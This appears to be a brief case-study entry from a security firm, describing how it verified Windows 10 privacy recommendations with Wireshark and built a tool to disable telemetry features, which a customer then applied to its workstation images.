  15. Work done Publicly available recommendations were combined, verified (using Wireshark) and supplemented by ZAO «PM» specialists; on this basis an automated tool, AM Privacy Protector for Windows 10, was developed, allowing selective disabling of OS mechanisms with questionable functionality. Results The proposed recommendations were accepted by the Customer and applied to the images used to deploy Windows 10 on new workstations. Based on the results of the work, an article was prepared for the media: www.anti-malware.ru/analytics/Threats_Analysis/Windows_10_Threshold_2, and the developed software was made publicly available: http://amonitoring.ru/cc/program/am-privacy-protector-w10/